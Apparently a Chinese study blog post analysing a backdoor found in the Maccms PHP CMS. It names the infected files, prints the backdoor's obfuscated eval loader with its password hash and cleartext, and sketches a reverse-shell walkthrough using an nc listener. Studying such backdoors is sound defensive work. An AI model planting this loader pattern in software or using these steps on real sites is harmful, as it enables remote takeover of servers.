zoukankan      html  css  js  c++  java
  • Maccms 后门分析

    (该文参考网络他人资料,仅为学习,不许用于非法用途)

    一、环境

      攻击者  : Kali Linux

      被攻击者 :Windows

      Maccms 网站基于php+mysql 的系统,易用性、功能良好等优点,用途范围广

      打开源码,maccms10extendQcloudSmsSms.php

          maccms10extendupyunsrcUpyunApiFormat.php

      查看该后门源码:

    <?php
    error_reporting(E_ERROR);
    @ini_set('display_errors','Off');
    @ini_set('max_execution_time',20000);
    @ini_set('memory_limit','256M');
    header("content-Type: text/html; charset=utf-8");
    $password = "0d41c75e2ab34a3740834cdd7e066d90";   //md5加密:WorldFilledWithLove
    function s(){
        $str = "编码之后的恶意代码";
        $str = str_rot13($str);    //对恶意代码进行ROT13编码
        m($str);
    }
    function m($str){
        global $password;
        $jj = '';
        eval($jj.pack('H*',$str).$jj);    //对混淆的PHP代码进行解码,解码之后的代码进行eval函数的解析
    }
    s();
    ?>

     二、步骤  

      Step1:使用密码访问 maccms10extendQcloudSmsSms.php

          或者 maccms10extendupyunsrcUpyunApiFormat.php

      Step2:反弹shell(将肉鸡/目标机上的终端或者shell弹到攻击者的电脑中,注意才需要攻击者提前监听端口,使用NC监听:nc -lvvp 7777,-l 表示本地,vv是详细信息,-p表示端口)

        1、开启监听端口

                nc -lvvp 777        

        2、反弹端口

         3、查看是否反弹成功

  • 相关阅读:
    移植nand驱动补缺:make mrproper与make clean以及make distclean,find/grep. makefile
    repo使用
    git使用总结
    notepade++使用
    linux内核源代码、配置与编译
    linux内核介绍
    块设备
    PHP和javascript中url编码解码详解
    python中的类方法、静态方法、对象方法
    webpack+vue中安装使用vue-layer弹窗插件
  • 原文地址:https://www.cnblogs.com/yuanshu/p/11683886.html
Copyright © 2011-2022 走看看